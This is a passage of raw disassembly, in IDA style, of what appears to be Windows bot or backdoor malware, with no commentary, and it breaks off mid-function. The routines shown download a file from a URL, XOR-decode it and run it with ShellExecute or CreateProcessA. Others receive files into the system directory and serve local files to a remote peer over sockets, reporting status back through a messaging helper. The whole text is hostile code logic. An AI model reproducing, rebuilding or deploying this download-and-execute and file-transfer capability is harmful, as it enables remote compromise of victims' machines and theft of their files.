push edi
push 0
push 1
push 2
call ds:dword_4364E8 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_40A95B
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call ds:dword_436468 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call ds:dword_4364A8 ; inet_addr
cmp eax, esi
jnz short loc_40A940
push [ebp+arg_0]
call ds:dword_4364EC ; gethostbyname
test eax, eax
jz short loc_40A95B
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_40A940: ; CODE XREF: sub_40A8DF+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call ds:dword_436410 ; connect
cmp eax, esi
jnz short loc_40A95F
push edi
call ds:dword_436500 ; closesocket
loc_40A95B: ; CODE XREF: sub_40A8DF+1B�j
; sub_40A8DF+58�j
mov eax, esi
jmp short loc_40A961
; ---------------------------------------------------------------------------
loc_40A95F: ; CODE XREF: sub_40A8DF+73�j
mov eax, edi
loc_40A961: ; CODE XREF: sub_40A8DF+7E�j
pop edi
pop esi
leave
retn
sub_40A8DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A965 proc near ; DATA XREF: sub_40D2E0+A88�o
var_11B4 = byte ptr -11B4h
var_1B4 = byte ptr -1B4h
var_1AC = byte ptr -1ACh
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 11B4h
call sub_415D00
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1B4]
rep movsd
push 1
pop esi
push [ebp+var_14]
mov [eax+1B0h], esi
lea eax, [ebp+var_1AC]
push eax
call sub_40A8DF
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
pop ecx
jnz short loc_40A9F8
lea eax, [ebp+var_11B4]
push offset dword_4297EC
push eax
call sub_415480
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_40A9DB
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40BAE7
add esp, 14h
loc_40A9DB: ; CODE XREF: sub_40A965+59�j
lea eax, [ebp+var_11B4]
push eax
call sub_40A5B3
push [ebp+var_10]
call sub_415248
pop ecx
pop ecx
push esi
call ds:dword_422044 ; ExitThread
loc_40A9F8: ; CODE XREF: sub_40A965+3F�j
push offset byte_4325D8
push ebx
call sub_409BB2
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40AA63
lea eax, [ebp+var_11B4]
push offset dword_4297AC
push eax
call sub_415480
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_40AA3F
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40BAE7
add esp, 14h
loc_40AA3F: ; CODE XREF: sub_40A965+BD�j
lea eax, [ebp+var_11B4]
push eax
call sub_40A5B3
pop ecx
push ebx
call ds:dword_436500 ; closesocket
push [ebp+var_10]
call sub_415248
pop ecx
push esi
call ds:dword_422044 ; ExitThread
loc_40AA63: ; CODE XREF: sub_40A965+A3�j
push 64h
call ds:dword_422054 ; Sleep
xor edi, edi
mov esi, 1000h
loc_40AA72: ; CODE XREF: sub_40A965+168�j
push esi
lea eax, [ebp+var_11B4]
push edi
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_11B4]
push edi
push esi
push eax
push ebx
call ds:dword_436480 ; recv
test eax, eax
jle short loc_40AACF
lea eax, [ebp+var_11B4]
push offset asc_425FD0 ; "\n"
push eax
call sub_415BA0
lea eax, [ebp+var_11B4]
push eax
call sub_40999E
add esp, 0Ch
test eax, eax
jz short loc_40AACF
push 64h
call ds:dword_422054 ; Sleep
push 7
call sub_415174
test eax, eax
pop ecx
jnz short loc_40AA72
loc_40AACF: ; CODE XREF: sub_40A965+130�j
; sub_40A965+154�j
lea eax, [ebp+var_11B4]
push offset dword_429768
push eax
call sub_415480
cmp [ebp+var_8], edi
pop ecx
pop ecx
jnz short loc_40AB02
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40BAE7
add esp, 14h
loc_40AB02: ; CODE XREF: sub_40A965+180�j
lea eax, [ebp+var_11B4]
push eax
call sub_40A5B3
pop ecx
push ebx
call ds:dword_436500 ; closesocket
push [ebp+var_10]
call sub_415248
pop ecx
push edi
call ds:dword_422044 ; ExitThread
sub_40A965 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AB26 proc near ; DATA XREF: sub_40D2E0+4A7C�o
var_A04 = byte ptr -0A04h
var_604 = byte ptr -604h
var_500 = dword ptr -500h
var_4FC = dword ptr -4FCh
var_3FC = byte ptr -3FCh
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
var_1E0 = byte ptr -1E0h
var_DC = byte ptr -0DCh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A04h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1FC]
rep movsd
push 1
xor esi, esi
pop ebx
mov [ebp+var_10], esi
push esi
push ebx
push 2
mov [eax+1B0h], ebx
mov [ebp+var_C], esi
mov [ebp+var_20], esi
call ds:dword_4364E8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_18], edi
jnz short loc_40AB74
push offset dword_429970
jmp loc_40AD2D
; ---------------------------------------------------------------------------
loc_40AB74: ; CODE XREF: sub_40AB26+42�j
push 10h
lea eax, [ebp+var_30]
push esi
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_30], 2
push esi
call ds:dword_436468 ; htons
mov word ptr [ebp+var_2E], ax
lea eax, [ebp+var_30]
push 10h
push eax
push edi
mov [ebp+var_2E+2], esi
call ds:dword_436494 ; bind
test eax, eax
jz short loc_40ABB2
push offset dword_42993C
jmp loc_40AD2D
; ---------------------------------------------------------------------------
loc_40ABB2: ; CODE XREF: sub_40AB26+80�j
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+var_30]
push eax
push edi
call ds:dword_43640C ; getsockname
push [ebp+var_2E]
call ds:dword_4363A4 ; htons
mov [ebp+var_4], eax
lea eax, [ebp+var_1E0]
push eax
mov [ebp+arg_0], esi
call sub_415C80
pop ecx
loc_40ABE4: ; CODE XREF: sub_40AB26+EF�j
mov ecx, [ebp+arg_0]
mov al, [ebp+ecx+var_1E0]
cmp al, 20h
jnz short loc_40ABF7
push 5Fh
pop eax
jmp short loc_40ABFA
; ---------------------------------------------------------------------------
loc_40ABF7: ; CODE XREF: sub_40AB26+CA�j
movsx eax, al
loc_40ABFA: ; CODE XREF: sub_40AB26+CF�j
mov [ebp+ecx+var_604], al
lea eax, [ebp+var_1E0]
inc ecx
push eax
mov [ebp+arg_0], ecx
call sub_415C80
cmp [ebp+arg_0], eax
pop ecx
jbe short loc_40ABE4
push ebx
push edi
call ds:dword_436490 ; listen
test eax, eax
jz short loc_40AC2D
push offset dword_4297EC
jmp loc_40AD2D
; ---------------------------------------------------------------------------
loc_40AC2D: ; CODE XREF: sub_40AB26+FB�j
push esi
push esi
push 3
push esi
push ebx
lea eax, [ebp+var_1E0]
push 80000000h
push eax
call ds:off_42207C
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_40AC57
push offset dword_42990C
jmp loc_40AD2D
; ---------------------------------------------------------------------------
loc_40AC57: ; CODE XREF: sub_40AB26+125�j
push esi
push eax
call ds:off_422078
mov [ebp+arg_0], eax
push eax
movzx eax, word ptr [ebp+var_4]
push eax
push [ebp+var_1FC]
call sub_409526
pop ecx
push eax
call ds:dword_4364A8 ; inet_addr
push eax
call ds:dword_436464 ; htonl
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_3FC]
push offset dword_4298F4
push eax
call sub_415480
push esi
lea eax, [ebp+var_3FC]
push esi
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_40BAE7
add esp, 2Ch
lea eax, [ebp+var_38]
mov [ebp+var_38], 3Ch
mov [ebp+var_34], esi
push eax
push esi
lea eax, [ebp+var_500]
push esi
push eax
push esi
mov [ebp+var_4FC], edi
mov [ebp+var_500], ebx
call ds:dword_436450 ; select
test eax, eax
jg short loc_40AD07
push esi
lea eax, [ebp+var_DC]
push [ebp+var_54]
push offset dword_4298CC
push eax
push [ebp+var_1FC]
call sub_40BAE7
jmp loc_40AE2B
; ---------------------------------------------------------------------------
loc_40AD07: ; CODE XREF: sub_40AB26+1BF�j
lea eax, [ebp+var_14]
mov [ebp+var_14], 10h
push eax
lea eax, [ebp+var_48]
push eax
push edi
call ds:dword_4364FC ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_1F8], eax
jnz short loc_40AD40
push offset dword_429898
loc_40AD2D: ; CODE XREF: sub_40AB26+49�j
; sub_40AB26+87�j ...
lea eax, [ebp+var_3FC]
push eax
call sub_415480
pop ecx
pop ecx
jmp loc_40AE2E
; ---------------------------------------------------------------------------
loc_40AD40: ; CODE XREF: sub_40AB26+200�j
push edi
call ds:dword_436500 ; closesocket
cmp [ebp+arg_0], esi
jz loc_40ADF2
mov edi, 400h
loc_40AD55: ; CODE XREF: sub_40AB26+2C3�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
cmp eax, edi
jge short loc_40AD62
mov [ebp+var_4], eax
loc_40AD62: ; CODE XREF: sub_40AB26+237�j
push edi
lea eax, [ebp+var_A04]
push esi
push eax
call sub_415500
mov eax, [ebp+arg_0]
add esp, 0Ch
neg eax
push 2
push esi
push eax
push [ebp+var_8]
call ds:off_42209C
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_8]
call ds:off_422098
push esi
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_1F8]
call ds:dword_4364B8 ; send
mov [ebp+var_4], eax
push esi
cdq
add [ebp+var_10], eax
lea eax, [ebp+var_A04]
push edi
push eax
push [ebp+var_1F8]
adc [ebp+var_C], edx
call ds:dword_436480 ; recv
cmp eax, ebx
jl loc_40AE87
mov eax, [ebp+var_4]
cmp eax, ebx
jl loc_40AE87
sub [ebp+arg_0], eax
jnz loc_40AD55
mov edi, [ebp+var_18]
loc_40ADF2: ; CODE XREF: sub_40AB26+224�j
push [ebp+var_8]
call ds:off_422074
push [ebp+var_C]
push [ebp+var_10]
call sub_40B62E
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1E0]
push eax
push [ebp+var_44]
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_3FC]
push offset dword_429848
push eax
call sub_415480
loc_40AE2B: ; CODE XREF: sub_40AB26+1DC�j
add esp, 14h
loc_40AE2E: ; CODE XREF: sub_40AB26+215�j
cmp [ebp+var_50], esi
jnz short loc_40AE53
push esi
lea eax, [ebp+var_3FC]
push [ebp+var_54]
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_40BAE7
add esp, 14h
loc_40AE53: ; CODE XREF: sub_40AB26+30B�j
lea eax, [ebp+var_3FC]
push eax
call sub_40A5B3
cmp edi, esi
pop ecx
jbe short loc_40AE6B
push edi
call ds:dword_436500 ; closesocket
loc_40AE6B: ; CODE XREF: sub_40AB26+33C�j
push [ebp+var_1F8]
call ds:dword_436500 ; closesocket
push [ebp+var_58]
call sub_415248
pop ecx
push esi
call ds:dword_422044 ; ExitThread
loc_40AE87: ; CODE XREF: sub_40AB26+2AF�j
; sub_40AB26+2BA�j
push esi
mov esi, offset dword_429820
push [ebp+var_54]
lea eax, [ebp+var_DC]
push esi
push eax
push [ebp+var_1FC]
call sub_40BAE7
push esi
call sub_40A5B3
add esp, 18h
push [ebp+var_1F8]
call ds:dword_436500 ; closesocket
push [ebp+var_58]
call sub_415248
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
sub_40AB26 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AEC8 proc near ; DATA XREF: sub_40D2E0+7C0�o
var_14C4 = byte ptr -14C4h
var_4C4 = byte ptr -4C4h
var_2C4 = byte ptr -2C4h
var_1C0 = dword ptr -1C0h
var_1B8 = byte ptr -1B8h
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 14C4h
call sub_415D00
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1C0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [ebp+var_8], ebx
mov [eax+1B0h], esi
lea eax, [ebp+var_2C4]
push 104h
push eax
call ds:dword_422058 ; GetSystemDirectoryA
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_2C4]
push offset aSS_2 ; "%s%s"
push eax
call sub_415480
add esp, 10h
lea eax, [ebp+var_2C4]
push ebx
push 80h
push 2
push ebx
push esi
push 40000000h
push eax
call ds:off_42207C
cmp eax, 0FFFFFFFFh
jnz short loc_40AF52
push offset dword_429A68
jmp short loc_40AF98
; ---------------------------------------------------------------------------
loc_40AF52: ; CODE XREF: sub_40AEC8+81�j
push eax
call ds:off_422074
lea eax, [ebp+var_2C4]
push offset aAB ; "a+b"
push eax
call sub_415B78
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_40AF7A
push offset dword_429A28
jmp short loc_40AF98
; ---------------------------------------------------------------------------
loc_40AF7A: ; CODE XREF: sub_40AEC8+A9�j
push [ebp+var_20]
lea eax, [ebp+var_1B8]
push eax
call sub_40A8DF
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+arg_0], eax
jnz short loc_40AFAB
push offset dword_4299F8
loc_40AF98: ; CODE XREF: sub_40AEC8+88�j
; sub_40AEC8+B0�j
lea eax, [ebp+var_4C4]
push eax
call sub_415480
pop ecx
pop ecx
jmp loc_40B0A7
; ---------------------------------------------------------------------------
loc_40AFAB: ; CODE XREF: sub_40AEC8+C9�j
mov esi, 1000h
loc_40AFB0: ; CODE XREF: sub_40AEC8+14E�j
push esi
lea eax, [ebp+var_14C4]
push ebx
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_14C4]
push ebx
push esi
push eax
push [ebp+arg_0]
call ds:dword_436480 ; recv
mov edi, eax
cmp edi, ebx
jz loc_40B077
cmp edi, 0FFFFFFFFh
jz short loc_40B018
push [ebp+var_4]
lea eax, [ebp+var_14C4]
push edi
push 1
push eax
call sub_41780F
add [ebp+var_8], edi
add esp, 10h
push [ebp+var_8]
call ds:dword_436464 ; htonl
mov [ebp+var_C], eax
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push [ebp+arg_0]
call ds:dword_4364B8 ; send
jmp short loc_40AFB0
; ---------------------------------------------------------------------------
loc_40B018: ; CODE XREF: sub_40AEC8+118�j
lea eax, [ebp+var_4C4]
push offset dword_429820
push eax
call sub_415480
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_40BAE7
lea eax, [ebp+var_4C4]
push eax
call sub_40A5B3
push [ebp+var_4]
call sub_415AD0
add esp, 24h
push [ebp+arg_0]
call ds:dword_436500 ; closesocket
push [ebp+var_1C]
call sub_415248
pop ecx
push 1
call ds:dword_422044 ; ExitThread
loc_40B077: ; CODE XREF: sub_40AEC8+10F�j
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_40B62E
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_4C4]
push offset dword_4299A4
push eax
call sub_415480
add esp, 14h
loc_40B0A7: ; CODE XREF: sub_40AEC8+DE�j
cmp [ebp+var_14], ebx
jnz short loc_40B0CC
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_40BAE7
add esp, 14h
loc_40B0CC: ; CODE XREF: sub_40AEC8+1E2�j
lea eax, [ebp+var_4C4]
push eax
call sub_40A5B3
cmp [ebp+var_4], ebx
pop ecx
jz short loc_40B0E7
push [ebp+var_4]
call sub_415AD0
pop ecx
loc_40B0E7: ; CODE XREF: sub_40AEC8+214�j
cmp [ebp+arg_0], ebx
jbe short loc_40B0F5
push [ebp+arg_0]
call ds:dword_436500 ; closesocket
loc_40B0F5: ; CODE XREF: sub_40AEC8+222�j
push [ebp+var_1C]
call sub_415248
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
sub_40AEC8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B105 proc near ; DATA XREF: sub_40D2E0+381E�o
; sub_40D2E0+3F6D�o
var_570 = qword ptr -570h
var_564 = qword ptr -564h
var_510 = byte ptr -510h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_2E4 = dword ptr -2E4h
var_2E0 = word ptr -2E0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_148 = byte ptr -148h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp+var_2CC]
push 1
rep movsd
pop edi
xor esi, esi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp+var_248]
push esi
push eax
push ds:dword_436418
call ds:dword_436378 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_18], eax
jz loc_40B591
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_148]
push 40000000h
push eax
call ds:off_42207C
cmp eax, edi
mov [ebp+var_20], eax
jnb short loc_40B1CC
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset unk_429CFC
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_40B1AF
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40BAE7
add esp, 14h
loc_40B1AF: ; CODE XREF: sub_40B105+88�j
lea eax, [ebp+var_510]
push eax
call sub_40A5B3
push [ebp+var_48]
call sub_415248
pop ecx
pop ecx
push esi
call ds:dword_422044 ; ExitThread
loc_40B1CC: ; CODE XREF: sub_40B105+68�j
xor edi, edi
call ds:dword_422048 ; GetTickCount
mov ebx, 7D000h
mov dword ptr [ebp+var_8+4], eax
push ebx
call sub_415D2F
pop ecx
mov [ebp+var_1C], eax
loc_40B1E6: ; CODE XREF: sub_40B105+1B4�j
push 200h
lea eax, [ebp+var_510]
push esi
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_510]
push 200h
push eax
push [ebp+var_18]
call ds:dword_436380 ; InternetReadFile
cmp [ebp+var_34], esi
jz short loc_40B22A
push [ebp+arg_0]
lea eax, [ebp+var_510]
push eax
call sub_40B5F7
pop ecx
pop ecx
loc_40B22A: ; CODE XREF: sub_40B105+112�j
lea eax, [ebp+var_24]
push esi
push eax
lea eax, [ebp+var_510]
push [ebp+arg_0]
push eax
push [ebp+var_20]
call ds:dword_4220B0 ; WriteFile
cmp edi, ebx
jnb short loc_40B268
mov eax, ebx
sub eax, edi
cmp eax, [ebp+arg_0]
jbe short loc_40B252
mov eax, [ebp+arg_0]
loc_40B252: ; CODE XREF: sub_40B105+148�j
push eax
lea eax, [ebp+var_510]
push eax
mov eax, [ebp+var_1C]
add eax, edi
push eax
call sub_415560
add esp, 0Ch
loc_40B268: ; CODE XREF: sub_40B105+13F�j
add edi, [ebp+arg_0]
cmp [ebp+var_3C], esi
jz short loc_40B275
cmp edi, [ebp+var_3C]
ja short loc_40B2BF
loc_40B275: ; CODE XREF: sub_40B105+169�j
cmp [ebp+var_44], 1
mov eax, edi
jz short loc_40B28F
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_429CB4
jmp short loc_40B29F
; ---------------------------------------------------------------------------
loc_40B28F: ; CODE XREF: sub_40B105+176�j
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_429C74
loc_40B29F: ; CODE XREF: sub_40B105+188�j
mov eax, [ebp+var_48]
imul eax, 234h
add eax, offset dword_43BCC0
push eax
call sub_415480
add esp, 10h
cmp [ebp+arg_0], esi
ja loc_40B1E6
loc_40B2BF: ; CODE XREF: sub_40B105+16E�j
cmp [ebp+var_3C], esi
mov [ebp+var_14], 1
jz short loc_40B314
cmp edi, [ebp+var_3C]
jz short loc_40B314
push [ebp+var_3C]
lea eax, [ebp+var_510]
mov [ebp+var_14], esi
push edi
push offset unk_429C30
push eax
call sub_415480
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40BAE7
lea eax, [ebp+var_510]
push eax
call sub_40A5B3
add esp, 28h
loc_40B314: ; CODE XREF: sub_40B105+1C4�j
; sub_40B105+1C9�j
call ds:dword_422048 ; GetTickCount
sub eax, dword ptr [ebp+var_8+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_20]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
call ds:off_422074
push [ebp+var_1C]
call sub_415DE1
cmp [ebp+var_38], esi
pop ecx
jz short loc_40B39E
lea eax, [ebp+var_148]
push eax
call sub_40A86D
cmp eax, [ebp+var_38]
pop ecx
jz short loc_40B39E
push [ebp+var_38]
mov [ebp+var_14], esi
push eax
lea eax, [ebp+var_510]
push offset unk_429BF8
push eax
call sub_415480
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40BAE7
lea eax, [ebp+var_510]
push eax
call sub_40A5B3
add esp, 28h
loc_40B39E: ; CODE XREF: sub_40B105+241�j
; sub_40B105+253�j
cmp [ebp+var_14], esi
jz loc_40B5DE
cmp [ebp+var_44], 1
jz loc_40B499
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_422680
lea eax, [ebp+var_148]
fstp [esp+564h+var_564]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul ds:dbl_422680
fstp [esp+570h+var_570]
push offset unk_429BB0
push eax
call sub_415480
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_40B419
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40BAE7
add esp, 14h
loc_40B419: ; CODE XREF: sub_40B105+2F2�j
lea eax, [ebp+var_510]
push eax
call sub_40A5B3
cmp [ebp+var_40], 1
pop ecx
jnz loc_40B5DE
push 5
push esi
lea eax, [ebp+var_148]
push esi
push eax
push offset aOpen ; "open"
push esi
call ds:dword_4363DC
cmp [ebp+var_30], esi
jnz loc_40B5DE
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset dword_429B7C
push eax
call sub_415480
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40BAE7
lea eax, [ebp+var_510]
push eax
call sub_40A5B3
add esp, 24h
jmp loc_40B5DE
; ---------------------------------------------------------------------------
loc_40B499: ; CODE XREF: sub_40B105+2A6�j
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_422680
lea eax, [ebp+var_148]
fstp [esp+564h+var_564]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul ds:dbl_422680
fstp [esp+570h+var_570]
push offset unk_429B2C
push eax
call sub_415480
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_40B501
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40BAE7
add esp, 14h
loc_40B501: ; CODE XREF: sub_40B105+3DA�j
lea eax, [ebp+var_510]
push eax
call sub_40A5B3
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_415500
push 44h
lea eax, [ebp+var_310]
pop edi
push edi
push esi
push eax
call sub_415500
add esp, 1Ch
mov [ebp+var_310], edi
lea eax, [ebp+var_10]
mov [ebp+var_304], offset byte_4325D8
push 1
mov [ebp+var_2E0], si
pop edi
push eax
lea eax, [ebp+var_310]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp+var_148]
push esi
push eax
push esi
mov [ebp+var_2E4], edi
call ds:dword_422104 ; CreateProcessA
cmp eax, edi
jnz short loc_40B583
call ds:dword_4363C8 ; WSACleanup
call sub_409288
push esi
call ds:off_42212C
loc_40B583: ; CODE XREF: sub_40B105+46A�j
lea eax, [ebp+var_148]
push eax
push offset unk_429AE4
jmp short loc_40B59D
; ---------------------------------------------------------------------------
loc_40B591: ; CODE XREF: sub_40B105+45�j
lea eax, [ebp+var_248]
push eax
push offset unk_429AA8
loc_40B59D: ; CODE XREF: sub_40B105+48A�j
lea eax, [ebp+var_510]
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_40B5D1
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40BAE7
add esp, 14h
loc_40B5D1: ; CODE XREF: sub_40B105+4AA�j
lea eax, [ebp+var_510]
push eax
call sub_40A5B3
pop ecx
loc_40B5DE: ; CODE XREF: sub_40B105+29C�j
; sub_40B105+325�j ...
push [ebp+var_18]
call ds:dword_43649C ; InternetCloseHandle
push [ebp+var_48]
call sub_415248
pop ecx
push esi
call ds:dword_422044 ; ExitThread
sub_40B105 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B5F7 proc near ; CODE XREF: sub_40B105+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_40B613
loc_40B603: ; CODE XREF: sub_40B5F7+1A�j
mov dl, ds:byte_42ACDC
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_40B603
locret_40B613: ; CODE XREF: sub_40B5F7+A�j
retn
sub_40B5F7 endp
; =============== S U B R O U T I N E =======================================
sub_40B614 proc near ; CODE XREF: sub_40D2E0+2A7E�p
; sub_40D2E0+2BA4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_417919
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_40B614 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B62E proc near ; CODE XREF: sub_4049CD+458�p
; sub_4049CD+5FD�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_43A838
push 0
push edi
call sub_415500
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_40B653: ; CODE XREF: sub_40B62E+5B�j
; sub_40B62E+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_4172F0
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_417370
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_40B691
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
